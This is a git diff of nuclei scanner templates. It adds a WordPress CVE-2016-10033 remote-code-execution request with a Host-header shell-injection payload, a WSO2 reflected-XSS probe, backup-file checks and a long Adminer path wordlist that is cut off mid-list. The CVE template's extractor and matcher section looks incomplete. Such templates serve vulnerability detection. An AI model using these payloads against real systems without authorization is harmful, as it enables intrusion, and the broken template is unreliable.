diff --git a/README.md b/README.md index a5d0c6fb0a..26f449abad 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 252 | vulnerabilities | 116 | exposed-panels | 108 | -| takeovers | 65 | exposures | 63 | technologies | 51 | +| cves | 254 | vulnerabilities | 117 | exposed-panels | 108 | +| takeovers | 65 | exposures | 64 | technologies | 51 | | misconfiguration | 54 | workflows | 24 | miscellaneous | 16 | | default-logins | 20 | exposed-tokens | 9 | dns | 8 | -| fuzzing | 5 | helpers | 3 | iot | 7 | +| fuzzing | 6 | helpers | 4 | iot | 7 | -**79 directories, 827 files**. +**79 directories, 833 files**. diff --git a/cves/2016/CVE-2016-10033.yaml b/cves/2016/CVE-2016-10033.yaml new file mode 100644 index 0000000000..cdae3cc13f --- /dev/null +++ b/cves/2016/CVE-2016-10033.yaml @@ -0,0 +1,50 @@ +id: CVE-2016-10033 +info: + name: Wordpress 4.6 Remote Code Execution + author: princechaddha + severity: high + reference: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html + tags: wordpress,cve,cve2016,rce + +requests: + - raw: + - |+ + GET /?author=1 HTTP/1.1 + Host: {{Hostname}} + Cache-Control: max-age=0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Language: en-US,en;q=0.9 + Connection: close + + - |+ + POST /wp-login.php?action=lostpassword HTTP/1.1 + Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null) + Connection: close + User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) + Accept: */* + Content-Length: 56 + Content-Type: application/x-www-form-urlencoded + + wp-submit=Get+New+Password&redirect_to=&user_login={{username}} + + unsafe: true + extractors: + - type: regex + name: username + internal: true + group: 1 + part: body + regex: + - 'Author:(?:[A-Za-z0-9 -\_="]+)?" + - "passwd" + condition: and + part: body + - type: status + status: + - 200 \ No newline at end of file diff --git a/cves/2020/CVE-2020-17453.yaml b/cves/2020/CVE-2020-17453.yaml new file mode 100644 index 0000000000..e6409d3a14 --- /dev/null +++ b/cves/2020/CVE-2020-17453.yaml @@ -0,0 +1,29 @@ +id: CVE-2020-17453 + +info: + name: WSO2 Carbon Management Console - XSS + author: madrobot + severity: medium + description: Reflected XSS vulnerability can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests. + tags: xss,wso2,cve2020 + # https://www.shodan.io/search?query=Server%3A+WSO2+Carbon+Server + +requests: + - method: GET + path: + - '{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "'';alert('nuclei')//';" + part: body + + - type: word + words: + - "text/html" + part: header diff --git a/exposed-panels/crxde.yaml b/exposed-panels/crxde-lite.yaml similarity index 93% rename from exposed-panels/crxde.yaml rename to exposed-panels/crxde-lite.yaml index 81e66661bc..36bd50be83 100644 --- a/exposed-panels/crxde.yaml +++ b/exposed-panels/crxde-lite.yaml @@ -1,4 +1,4 @@ -id: crxde +id: crxde-lite info: name: CRXDE Lite diff --git a/exposed-panels/gitlab-detect.yaml b/exposed-panels/gitlab-detect.yaml index 5900c52769..e91e5c1eeb 100644 --- a/exposed-panels/gitlab-detect.yaml +++ b/exposed-panels/gitlab-detect.yaml @@ -9,14 +9,16 @@ requests: - method: GET path: - "{{BaseURL}}/users/sign_in" - - "{{BaseURL}}/users/sign_up" - - "{{BaseURL}}/explore" redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word words: - - "GitLab" - - "Register for GitLab" - - "Explore GitLab" + - 'GitLab' + - 'https://about.gitlab.com' + + - type: status + status: + - 200 \ No newline at end of file diff --git a/exposures/apis/openapi.yaml b/exposures/apis/openapi.yaml index dc6f1590c7..8d7995c92a 100644 --- a/exposures/apis/openapi.yaml +++ b/exposures/apis/openapi.yaml @@ -4,6 +4,7 @@ info: name: OpenAPI author: pdteam severity: info + tags: api requests: - method: GET diff --git a/exposures/apis/swagger-api.yaml b/exposures/apis/swagger-api.yaml index 19332c6a4e..29be15e816 100644 --- a/exposures/apis/swagger-api.yaml +++ b/exposures/apis/swagger-api.yaml @@ -1,9 +1,10 @@ id: swagger-api info: - name: Swagger API - author: pd-team + name: Public Swagger API + author: pdteam severity: info + tags: api,swagger requests: - method: GET diff --git a/exposures/apis/wadl-api.yaml b/exposures/apis/wadl-api.yaml index adf4433d25..94c70ca79a 100644 --- a/exposures/apis/wadl-api.yaml +++ b/exposures/apis/wadl-api.yaml @@ -4,6 +4,7 @@ info: name: wadl file disclosure author: 0xrudra & manuelbua severity: info + tags: api # References: # - https://github.com/dwisiswant0/wadl-dumper diff --git a/exposures/apis/wsdl-api.yaml b/exposures/apis/wsdl-api.yaml index 44d7f7b49a..df3a326bcb 100644 --- a/exposures/apis/wsdl-api.yaml +++ b/exposures/apis/wsdl-api.yaml @@ -4,6 +4,7 @@ info: name: wsdl-detect author: jarijaas severity: info + tags: api # This detects web services that have WSDL (https://www.w3.org/TR/wsdl/) # For instance, SOAP services, such as: https://docs.microsoft.com/en-us/xamarin/xamarin-forms/data-cloud/web-services/asmx diff --git a/exposures/backups/settings-php-files.yaml b/exposures/backups/settings-php-files.yaml new file mode 100644 index 0000000000..9c5be63cd5 --- /dev/null +++ b/exposures/backups/settings-php-files.yaml @@ -0,0 +1,29 @@ +id: settings-php-files + +info: + name: settings.php information disclosure + author: sheikhrishad + severity: medium + tags: backup + +requests: + - method: GET + path: + - "{{BaseURL}}/settings.php.bak" + - "{{BaseURL}}/settings.php.dist" + - "{{BaseURL}}/settings.php.old" + - "{{BaseURL}}/settings.php.save" + - "{{BaseURL}}/settings.php.swp" + - "{{BaseURL}}/settings.php.txt" + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/exposures/backups/sql-dump.yaml b/exposures/backups/sql-dump.yaml index 424ea48ab7..1768459cae 100644 --- a/exposures/backups/sql-dump.yaml +++ b/exposures/backups/sql-dump.yaml @@ -4,6 +4,7 @@ info: name: MySQL Dump Files author: geeknik & @dwisiswant0 severity: medium + tags: backup requests: - method: GET diff --git a/exposures/backups/zip-backup-files.yaml b/exposures/backups/zip-backup-files.yaml index 5faaea01e7..23d1d46fc0 100644 --- a/exposures/backups/zip-backup-files.yaml +++ b/exposures/backups/zip-backup-files.yaml @@ -4,6 +4,7 @@ info: name: Compressed Web File author: Toufik Airane & @dwisiswant0 severity: medium + tags: backup requests: - method: GET diff --git a/fuzzing/adminer-panel-fuzz.yaml b/fuzzing/adminer-panel-fuzz.yaml new file mode 100644 index 0000000000..17229354b9 --- /dev/null +++ b/fuzzing/adminer-panel-fuzz.yaml @@ -0,0 +1,46 @@ +id: adminer-panel-fuzz +info: + name: Adminer Login Panel Fuzz + author: random-robbie & meme-lord + severity: info + reference: https://blog.sorcery.ie/posts/adminer/ + tags: fuzz,adminer + + # <= 4.2.4 can have unauthenticated RCE via SQLite driver + # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL + # Most versions have some kind of SSRF usability + # Is generally handy if you find SQL creds + +requests: + + - payloads: + path: helpers/wordlists/adminer-paths.txt + + attack: sniper + threads: 50 + + raw: + - | + GET {{path}} HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Accept-Language: en-US,en;q=0.5 + Referer: {{BaseURL}} + + matchers-condition: and + matchers: + + - type: word + words: + - "Login - Adminer" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '([0-9.]+)' diff --git a/helpers/wordlists/adminer-paths.txt b/helpers/wordlists/adminer-paths.txt new file mode 100644 index 0000000000..602d7b2d27 --- /dev/null +++ b/helpers/wordlists/adminer-paths.txt @@ -0,0 +1,741 @@ +/_adminer.php +/adm.php +/admin/adminer.php +/adminer-2.0.0.php +/adminer-2.1.0.php +/adminer-2.2.0.php +/adminer-2.2.1.php +/adminer-2.3.0.php +/adminer-2.3.2.php +/adminer-3.0.0.php +/adminer-3.0.1-en.php +/adminer-3.0.1-mysql-en.php +/adminer-3.0.1-mysql.php +/adminer-3.0.1.php +/adminer-3.0.1/ +/adminer-3.1.0-en.php +/adminer-3.1.0-mysql-en.php +/adminer-3.1.0-mysql.php +/adminer-3.1.0.php +/adminer-3.1.0/ +/adminer-3.2.0-en.php +/adminer-3.2.0-mysql-en.php +/adminer-3.2.0-mysql.php +/adminer-3.2.0.php +/adminer-3.2.0/ +/adminer-3.2.1.php +/adminer-3.2.2-en.php +/adminer-3.2.2-mysql-en.php +/adminer-3.2.2-mysql.php +/adminer-3.2.2.php +/adminer-3.2.2/ +/adminer-3.3.0-en.php +/adminer-3.3.0-mysql-en.php +/adminer-3.3.0-mysql.php +/adminer-3.3.0.php +/adminer-3.3.0/ +/adminer-3.3.1-en.php +/adminer-3.3.1-mysql-en.php +/adminer-3.3.1-mysql.php +/adminer-3.3.1.php +/adminer-3.3.1/ +/adminer-3.3.2.php +/adminer-3.3.3-en.php +/adminer-3.3.3-mysql-en.php +/adminer-3.3.3-mysql.php +/adminer-3.3.3.php +/adminer-3.3.3/ +/adminer-3.3.4-en.php +/adminer-3.3.4-mysql-en.php +/adminer-3.3.4-mysql.php +/adminer-3.3.4.php +/adminer-3.3.4/ +/adminer-3.4.0-en.php +/adminer-3.4.0-mysql-en.php +/adminer-3.4.0-mysql.php +/adminer-3.4.0.php +/adminer-3.4.0/ +/adminer-3.5.0.php +/adminer-3.5.1-en.php +/adminer-3.5.1-mysql-en.php +/adminer-3.5.1-mysql.php +/adminer-3.5.1.php +/adminer-3.5.1/ +/adminer-3.6.0.php +/adminer-3.6.1-en.php +/adminer-3.6.1-mysql-en.php +/adminer-3.6.1-mysql.php +/adminer-3.6.1.php +/adminer-3.6.1/ +/adminer-3.6.2-en.php +/adminer-3.6.2-mysql-en.php +/adminer-3.6.2-mysql.php +/adminer-3.6.2.php +/adminer-3.6.2/ +/adminer-3.6.3-en.php +/adminer-3.6.3-mysql-en.php +/adminer-3.6.3-mysql.php +/adminer-3.6.3.php +/adminer-3.6.3/ +/adminer-3.6.4-en.php +/adminer-3.6.4-mysql-en.php +/adminer-3.6.4-mysql.php +/adminer-3.6.4.php +/adminer-3.6.4/ +/adminer-3.7.0-en.php +/adminer-3.7.0-mysql-en.php +/adminer-3.7.0-mysql.php +/adminer-3.7.0.php +/adminer-3.7.0/ +/adminer-3.7.1-en.php +/adminer-3.7.1-mysql-en.php +/adminer-3.7.1-mysql.php +/adminer-3.7.1.php +/adminer-3.7.1/ +/adminer-4.0.0.php +/adminer-4.0.1-en.php +/adminer-4.0.1-mysql-en.php +/adminer-4.0.1-mysql.php +/adminer-4.0.1.php +/adminer-4.0.1/ +/adminer-4.0.2-en.php +/adminer-4.0.2-mysql-en.php +/adminer-4.0.2-mysql.php +/adminer-4.0.2.php +/adminer-4.0.2/ +/adminer-4.0.3-en.php +/adminer-4.0.3-mysql-en.php +/adminer-4.0.3-mysql.php +/adminer-4.0.3.php +/adminer-4.0.3/ +/adminer-4.1.0-en.php +/adminer-4.1.0-mysql-en.php +/adminer-4.1.0-mysql.php +/adminer-4.1.0.php +/adminer-4.1.0/ +/adminer-4.2.0-en.php +/adminer-4.2.0-mysql-en.php +/adminer-4.2.0-mysql.php +/adminer-4.2.0.php +/adminer-4.2.0/ +/adminer-4.2.1-en.php +/adminer-4.2.1-mysql-en.php +/adminer-4.2.1-mysql.php +/adminer-4.2.1.php +/adminer-4.2.1/ +/adminer-4.2.2-en.php +/adminer-4.2.2-mysql-en.php +/adminer-4.2.2-mysql.php +/adminer-4.2.2.php +/adminer-4.2.2/ +/adminer-4.2.3-en.php +/adminer-4.2.3-mysql-en.php +/adminer-4.2.3-mysql.php +/adminer-4.2.3.php +/adminer-4.2.3/ +/adminer-4.2.4-en.php +/adminer-4.2.4-mysql-en.php +/adminer-4.2.4-mysql.php +/adminer-4.2.4.php +/adminer-4.2.4/ +/adminer-4.2.5-cs.php +/adminer-4.2.5-de.php +/adminer-4.2.5-en.php +/adminer-4.2.5-mysql-cs.php +/adminer-4.2.5-mysql-de.php +/adminer-4.2.5-mysql-en.php +/adminer-4.2.5-mysql-pl.php +/adminer-4.2.5-mysql-sk.php +/adminer-4.2.5-mysql.php +/adminer-4.2.5-pl.php +/adminer-4.2.5-sk.php +/adminer-4.2.5.php +/adminer-4.2.5/ +/adminer-4.3.0-cs.php +/adminer-4.3.0-de.php +/adminer-4.3.0-en.php +/adminer-4.3.0-mysql-cs.php +/adminer-4.3.0-mysql-de.php +/adminer-4.3.0-mysql-en.php +/adminer-4.3.0-mysql-pl.php +/adminer-4.3.0-mysql-sk.php +/adminer-4.3.0-mysql.php +/adminer-4.3.0-pl.php +/adminer-4.3.0-sk.php +/adminer-4.3.0.php +/adminer-4.3.0/ +/adminer-4.3.1-cs.php +/adminer-4.3.1-de.php +/adminer-4.3.1-en.php +/adminer-4.3.1-mysql-cs.php +/adminer-4.3.1-mysql-de.php +/adminer-4.3.1-mysql-en.php +/adminer-4.3.1-mysql-pl.php +/adminer-4.3.1-mysql-sk.php +/adminer-4.3.1-mysql.php +/adminer-4.3.1-pl.php +/adminer-4.3.1-sk.php +/adminer-4.3.1.php +/adminer-4.3.1/ +/adminer-4.4.0-cs.php +/adminer-4.4.0-de.php +/adminer-4.4.0-en.php +/adminer-4.4.0-mysql-cs.php +/adminer-4.4.0-mysql-de.php +/adminer-4.4.0-mysql-en.php +/adminer-4.4.0-mysql-pl.php +/adminer-4.4.0-mysql-sk.php +/adminer-4.4.0-mysql.php +/adminer-4.4.0-pl.php +/adminer-4.4.0-sk.php +/adminer-4.4.0.php +/adminer-4.4.0/ +/adminer-4.5.0-cs.php +/adminer-4.5.0-de.php +/adminer-4.5.0-en.php +/adminer-4.5.0-mysql-cs.php +/adminer-4.5.0-mysql-de.php +/adminer-4.5.0-mysql-en.php +/adminer-4.5.0-mysql-pl.php +/adminer-4.5.0-mysql-sk.php +/adminer-4.5.0-mysql.php +/adminer-4.5.0-pl.php +/adminer-4.5.0-sk.php +/adminer-4.5.0.php +/adminer-4.5.0/ +/adminer-4.6.0-cs.php +/adminer-4.6.0-de.php +/adminer-4.6.0-en.php +/adminer-4.6.0-mysql-cs.php +/adminer-4.6.0-mysql-de.php +/adminer-4.6.0-mysql-en.php +/adminer-4.6.0-mysql-pl.php +/adminer-4.6.0-mysql-sk.php +/adminer-4.6.0-mysql.php +/adminer-4.6.0-pl.php +/adminer-4.6.0-sk.php +/adminer-4.6.0.php +/adminer-4.6.0/ +/adminer-4.6.1-cs.php +/adminer-4.6.1-de.php +/adminer-4.6.1-en.php +/adminer-4.6.1-mysql-cs.php +/adminer-4.6.1-mysql-de.php +/adminer-4.6.1-mysql-en.php +/adminer-4.6.1-mysql-pl.php +/adminer-4.6.1-mysql-sk.php +/adminer-4.6.1-mysql.php +/adminer-4.6.1-pl.php +/adminer-4.6.1-sk.php +/adminer-4.6.1.php +/adminer-4.6.1/ +/adminer-4.6.2-cs.php +/adminer-4.6.2-de.php +/adminer-4.6.2-en.php +/adminer-4.6.2-mysql-cs.php +/adminer-4.6.2-mysql-de.php +/adminer-4.6.2-mysql-en.php +/adminer-4.6.2-mysql-pl.php +/adminer-4.6.2-mysql-sk.php +/adminer-4.6.2-mysql.php +/adminer-4.6.2-pl.php +/adminer-4.6.2-sk.php +/adminer-4.6.2.php +/adminer-4.6.2/ +/adminer-4.6.3-cs.php +/adminer-4.6.3-de.php +/adminer-4.6.3-en.php +/adminer-4.6.3-mysql-cs.php +/adminer-4.6.3-mysql-de.php +/adminer-4.6.3-mysql-en.php +/adminer-4.6.3-mysql-pl.php +/adminer-4.6.3-mysql-sk.php +/adminer-4.6.3-mysql.php +/adminer-4.6.3-pl.php +/adminer-4.6.3-sk.php +/adminer-4.6.3.php +/adminer-4.6.3/ +/adminer-4.7.0-cs.php +/adminer-4.7.0-de.php +/adminer-4.7.0-en.php +/adminer-4.7.0-mysql-cs.php +/adminer-4.7.0-mysql-de.php +/adminer-4.7.0-mysql-en.php +/adminer-4.7.0-mysql-pl.php +/adminer-4.7.0-mysql-sk.php +/adminer-4.7.0-mysql.php +/adminer-4.7.0-pl.php +/adminer-4.7.0-sk.php +/adminer-4.7.0.php +/adminer-4.7.0/ +/adminer-4.7.1-cs.php +/adminer-4.7.1-de.php +/adminer-4.7.1-en.php +/adminer-4.7.1-mysql-cs.php +/adminer-4.7.1-mysql-de.php +/adminer-4.7.1-mysql-en.php +/adminer-4.7.1-mysql-pl.php +/adminer-4.7.1-mysql-sk.php +/adminer-4.7.1-mysql.php +/adminer-4.7.1-pl.php +/adminer-4.7.1-sk.php +/adminer-4.7.1.php +/adminer-4.7.1/ +/adminer-4.7.2-cs.php +/adminer-4.7.2-de.php +/adminer-4.7.2-en.php +/adminer-4.7.2-mysql-cs.php +/adminer-4.7.2-mysql-de.php +/adminer-4.7.2-mysql-en.php +/adminer-4.7.2-mysql-pl.php +/adminer-4.7.2-mysql-sk.php +/adminer-4.7.2-mysql.php +/adminer-4.7.2-pl.php +/adminer-4.7.2-sk.php +/adminer-4.7.2.php +/adminer-4.7.2/ +/adminer-4.7.3-cs.php +/adminer-4.7.3-de.php +/adminer-4.7.3-en.php +/adminer-4.7.3-mysql-cs.php +/adminer-4.7.3-mysql-de.php +/adminer-4.7.3-mysql-en.php +/adminer-4.7.3-mysql-pl.php +/adminer-4.7.3-mysql-sk.php +/adminer-4.7.3-mysql.php +/adminer-4.7.3-pl.php +/adminer-4.7.3-sk.php +/adminer-4.7.3.php +/adminer-4.7.3/ +/adminer-4.7.4-cs.php +/adminer-4.7.4-de.php +/adminer-4.7.4-en.php +/adminer-4.7.4-mysql-cs.php +/adminer-4.7.4-mysql-de.php +/adminer-4.7.4-mysql-en.php +/adminer-4.7.4-mysql-pl.php +/adminer-4.7.4-mysql-sk.php +/adminer-4.7.4-mysql.php +/adminer-4.7.4-pl.php +/adminer-4.7.4-sk.php +/adminer-4.7.4.php +/adminer-4.7.4/ +/adminer-4.7.5-cs.php +/adminer-4.7.5-de.php +/adminer-4.7.5-en.php +/adminer-4.7.5-mysql-cs.php +/adminer-4.7.5-mysql-de.php +/adminer-4.7.5-mysql-en.php +/adminer-4.7.5-mysql-pl.php +/adminer-4.7.5-mysql-sk.php +/adminer-4.7.5-mysql.php +/adminer-4.7.5-pl.php +/adminer-4.7.5-sk.php +/adminer-4.7.5.php +/adminer-4.7.5/ +/adminer-4.7.6-cs.php +/adminer-4.7.6-de.php +/adminer-4.7.6-en.php +/adminer-4.7.6-mysql-cs.php +/adminer-4.7.6-mysql-de.php +/adminer-4.7.6-mysql-en.php +/adminer-4.7.6-mysql-pl.php +/adminer-4.7.6-mysql-sk.php +/adminer-4.7.6-mysql.php +/adminer-4.7.6-pl.php +/adminer-4.7.6-sk.php +/adminer-4.7.6.php +/adminer-4.7.6/ +/adminer-4.7.7-cs.php +/adminer-4.7.7-de.php +/adminer-4.7.7-en.php +/adminer-4.7.7-mysql-cs.php +/adminer-4.7.7-mysql-de.php +/adminer-4.7.7-mysql-en.php +/adminer-4.7.7-mysql-pl.php +/adminer-4.7.7-mysql-sk.php +/adminer-4.7.7-mysql.php +/adminer-4.7.7-pl.php +/adminer-4.7.7-sk.php +/adminer-4.7.7.php +/adminer-4.7.7/ +/adminer-4.7.8-cs.php +/adminer-4.7.8-de.php +/adminer-4.7.8-en.php +/adminer-4.7.8-mysql-cs.php +/adminer-4.7.8-mysql-de.php +/adminer-4.7.8-mysql-en.php +/adminer-4.7.8-mysql-pl.php +/adminer-4.7.8-mysql-sk.php +/adminer-4.7.8-mysql.php +/adminer-4.7.8-pl.php +/adminer-4.7.8-sk.php +/adminer-4.7.8.php +/adminer-4.7.8/ +/adminer-4.7.9-cs.php +/adminer-4.7.9-de.php +/adminer-4.7.9-en.php +/adminer-4.7.9-mysql-cs.php +/adminer-4.7.9-mysql-de.php +/adminer-4.7.9-mysql-en.php +/adminer-4.7.9-mysql-pl.php +/adminer-4.7.9-mysql-sk.php +/adminer-4.7.9-mysql.php +/adminer-4.7.9-pl.php +/adminer-4.7.9-sk.php +/adminer-4.7.9.php +/adminer-4.7.9/ +/adminer-4.8.0-cs.php +/adminer-4.8.0-de.php +/adminer-4.8.0-en.php +/adminer-4.8.0-mysql-cs.php +/adminer-4.8.0-mysql-de.php +/adminer-4.8.0-mysql-en.php +/adminer-4.8.0-mysql-pl.php +/adminer-4.8.0-mysql-sk.php +/adminer-4.8.0-mysql.php +/adminer-4.8.0-pl.php +/adminer-4.8.0-sk.php +/adminer-4.8.0.php +/adminer-4.8.0/ +/adminer-mysql.php +/adminer.php +/adminer/ +/adminer/adminer.php +/adminer1.php +/data/adminer.php +/editor-3.0.1-mysql-en.php +/editor-3.0.1-mysql.php +/editor-3.0.1.php +/editor-3.1.0-mysql-en.php +/editor-3.1.0-mysql.php +/editor-3.1.0.php +/editor-3.2.0-mysql-en.php +/editor-3.2.0-mysql.php +/editor-3.2.0.php +/editor-3.2.2-mysql-en.php +/editor-3.2.2-mysql.php +/editor-3.2.2.php +/editor-3.3.0-mysql-en.php +/editor-3.3.0-mysql.php +/editor-3.3.0.php +/editor-3.3.1-mysql-en.php +/editor-3.3.1-mysql.php +/editor-3.3.1.php +/editor-3.3.3-mysql-en.php +/editor-3.3.3-mysql.php +/editor-3.3.3.php +/editor-3.3.4-mysql-en.php +/editor-3.3.4-mysql.php +/editor-3.3.4.php +/editor-3.4.0-mysql-en.php +/editor-3.4.0-mysql.php +/editor-3.4.0.php +/editor-3.5.1-mysql-en.php +/editor-3.5.1-mysql.php +/editor-3.5.1.php +/editor-3.6.1-mysql-en.php +/editor-3.6.1-mysql.php +/editor-3.6.1.php +/editor-3.6.2-mysql-en.php +/editor-3.6.2-mysql.php +/editor-3.6.2.php +/editor-3.6.3-mysql-en.php +/editor-3.6.3-mysql.php +/editor-3.6.3.php +/editor-3.6.4-mysql-en.php +/editor-3.6.4-mysql.php +/editor-3.6.4.php +/editor-3.7.0-mysql-en.php +/editor-3.7.0-mysql.php +/editor-3.7.0.php +/editor-3.7.1-mysql-en.php +/editor-3.7.1-mysql.php +/editor-3.7.1.php +/editor-4.0.1-en.php +/editor-4.0.1-mysql-en.php +/editor-4.0.1-mysql.php +/editor-4.0.1.php +/editor-4.0.2-en.php +/editor-4.0.2-mysql-en.php +/editor-4.0.2-mysql.php +/editor-4.0.2.php +/editor-4.0.3-en.php +/editor-4.0.3-mysql-en.php +/editor-4.0.3-mysql.php +/editor-4.0.3.php +/editor-4.1.0-en.php +/editor-4.1.0-mysql-en.php +/editor-4.1.0-mysql.php +/editor-4.1.0.php +/editor-4.2.0-en.php +/editor-4.2.0-mysql-en.php +/editor-4.2.0-mysql.php +/editor-4.2.0.php +/editor-4.2.1-en.php +/editor-4.2.1-mysql-en.php +/editor-4.2.1-mysql.php +/editor-4.2.1.php +/editor-4.2.2-en.php +/editor-4.2.2-mysql-en.php +/editor-4.2.2-mysql.php +/editor-4.2.2.php +/editor-4.2.3-en.php +/editor-4.2.3-mysql-en.php +/editor-4.2.3-mysql.php +/editor-4.2.3.php +/editor-4.2.4-en.php +/editor-4.2.4-mysql-en.php +/editor-4.2.4-mysql.php +/editor-4.2.4.php +/editor-4.2.5-cs.php +/editor-4.2.5-de.php +/editor-4.2.5-en.php +/editor-4.2.5-mysql-cs.php +/editor-4.2.5-mysql-de.php +/editor-4.2.5-mysql-en.php +/editor-4.2.5-mysql-pl.php +/editor-4.2.5-mysql-sk.php +/editor-4.2.5-mysql.php +/editor-4.2.5-pl.php +/editor-4.2.5-sk.php +/editor-4.2.5.php +/editor-4.3.0-cs.php +/editor-4.3.0-de.php +/editor-4.3.0-en.php +/editor-4.3.0-mysql-cs.php +/editor-4.3.0-mysql-de.php +/editor-4.3.0-mysql-en.php +/editor-4.3.0-mysql-pl.php +/editor-4.3.0-mysql-sk.php +/editor-4.3.0-mysql.php +/editor-4.3.0-pl.php +/editor-4.3.0-sk.php +/editor-4.3.0.php +/editor-4.3.1-cs.php +/editor-4.3.1-de.php +/editor-4.3.1-en.php +/editor-4.3.1-mysql-cs.php +/editor-4.3.1-mysql-de.php +/editor-4.3.1-mysql-en.php +/editor-4.3.1-mysql-pl.php +/editor-4.3.1-mysql-sk.php +/editor-4.3.1-mysql.php +/editor-4.3.1-pl.php +/editor-4.3.1-sk.php +/editor-4.3.1.php +/editor-4.4.0-cs.php +/editor-4.4.0-de.php +/editor-4.4.0-en.php +/editor-4.4.0-mysql-cs.php +/editor-4.4.0-mysql-de.php +/editor-4.4.0-mysql-en.php +/editor-4.4.0-mysql-pl.php +/editor-4.4.0-mysql-sk.php +/editor-4.4.0-mysql.php +/editor-4.4.0-pl.php +/editor-4.4.0-sk.php +/editor-4.4.0.php +/editor-4.5.0-cs.php +/editor-4.5.0-de.php +/editor-4.5.0-en.php +/editor-4.5.0-mysql-cs.php +/editor-4.5.0-mysql-de.php +/editor-4.5.0-mysql-en.php +/editor-4.5.0-mysql-pl.php +/editor-4.5.0-mysql-sk.php +/editor-4.5.0-mysql.php +/editor-4.5.0-pl.php +/editor-4.5.0-sk.php +/editor-4.5.0.php +/editor-4.6.0-cs.php +/editor-4.6.0-de.php +/editor-4.6.0-en.php +/editor-4.6.0-mysql-cs.php +/editor-4.6.0-mysql-de.php +/editor-4.6.0-mysql-en.php +/editor-4.6.0-mysql-pl.php +/editor-4.6.0-mysql-sk.php +/editor-4.6.0-mysql.php +/editor-4.6.0-pl.php +/editor-4.6.0-sk.php +/editor-4.6.0.php +/editor-4.6.1-cs.php +/editor-4.6.1-de.php +/editor-4.6.1-en.php +/editor-4.6.1-mysql-cs.php +/editor-4.6.1-mysql-de.php +/editor-4.6.1-mysql-en.php +/editor-4.6.1-mysql-pl.php +/editor-4.6.1-mysql-sk.php +/editor-4.6.1-mysql.php +/editor-4.6.1-pl.php +/editor-4.6.1-sk.php +/editor-4.6.1.php +/editor-4.6.2-cs.php +/editor-4.6.2-de.php +/editor-4.6.2-en.php +/editor-4.6.2-mysql-cs.php +/editor-4.6.2-mysql-de.php +/editor-4.6.2-mysql-en.php +/editor-4.6.2-mysql-pl.php +/editor-4.6.2-mysql-sk.php +/editor-4.6.2-mysql.php +/editor-4.6.2-pl.php +/editor-4.6.2-sk.php +/editor-4.6.2.php +/editor-4.6.3-cs.php +/editor-4.6.3-de.php +/editor-4.6.3-en.php +/editor-4.6.3-mysql-cs.php +/editor-4.6.3-mysql-de.php +/editor-4.6.3-mysql-en.php +/editor-4.6.3-mysql-pl.php +/editor-4.6.3-mysql-sk.php +/editor-4.6.3-mysql.php +/editor-4.6.3-pl.php +/editor-4.6.3-sk.php +/editor-4.6.3.php +/editor-4.7.0-cs.php +/editor-4.7.0-de.php +/editor-4.7.0-en.php +/editor-4.7.0-mysql-cs.php +/editor-4.7.0-mysql-de.php +/editor-4.7.0-mysql-en.php +/editor-4.7.0-mysql-pl.php +/editor-4.7.0-mysql-sk.php +/editor-4.7.0-mysql.php +/editor-4.7.0-pl.php +/editor-4.7.0-sk.php +/editor-4.7.0.php +/editor-4.7.1-cs.php +/editor-4.7.1-de.php +/editor-4.7.1-en.php +/editor-4.7.1-mysql-cs.php +/editor-4.7.1-mysql-de.php +/editor-4.7.1-mysql-en.php +/editor-4.7.1-mysql-pl.php +/editor-4.7.1-mysql-sk.php +/editor-4.7.1-mysql.php +/editor-4.7.1-pl.php +/editor-4.7.1-sk.php +/editor-4.7.1.php +/editor-4.7.2-cs.php +/editor-4.7.2-de.php +/editor-4.7.2-en.php +/editor-4.7.2-mysql-cs.php +/editor-4.7.2-mysql-de.php +/editor-4.7.2-mysql-en.php +/editor-4.7.2-mysql-pl.php +/editor-4.7.2-mysql-sk.php +/editor-4.7.2-mysql.php +/editor-4.7.2-pl.php +/editor-4.7.2-sk.php +/editor-4.7.2.php +/editor-4.7.3-cs.php +/editor-4.7.3-de.php +/editor-4.7.3-en.php +/editor-4.7.3-mysql-cs.php +/editor-4.7.3-mysql-de.php +/editor-4.7.3-mysql-en.php +/editor-4.7.3-mysql-pl.php +/editor-4.7.3-mysql-sk.php +/editor-4.7.3-mysql.php +/editor-4.7.3-pl.php +/editor-4.7.3-sk.php +/editor-4.7.3.php +/editor-4.7.4-cs.php +/editor-4.7.4-de.php +/editor-4.7.4-en.php +/editor-4.7.4-mysql-cs.php +/editor-4.7.4-mysql-de.php +/editor-4.7.4-mysql-en.php +/editor-4.7.4-mysql-pl.php +/editor-4.7.4-mysql-sk.php +/editor-4.7.4-mysql.php +/editor-4.7.4-pl.php +/editor-4.7.4-sk.php +/editor-4.7.4.php +/editor-4.7.5-cs.php +/editor-4.7.5-de.php +/editor-4.7.5-en.php +/editor-4.7.5-mysql-cs.php +/editor-4.7.5-mysql-de.php +/editor-4.7.5-mysql-en.php +/editor-4.7.5-mysql-pl.php +/editor-4.7.5-mysql-sk.php +/editor-4.7.5-mysql.php +/editor-4.7.5-pl.php +/editor-4.7.5-sk.php +/editor-4.7.5.php +/editor-4.7.6-cs.php +/editor-4.7.6-de.php +/editor-4.7.6-en.php +/editor-4.7.6-mysql-cs.php +/editor-4.7.6-mysql-de.php 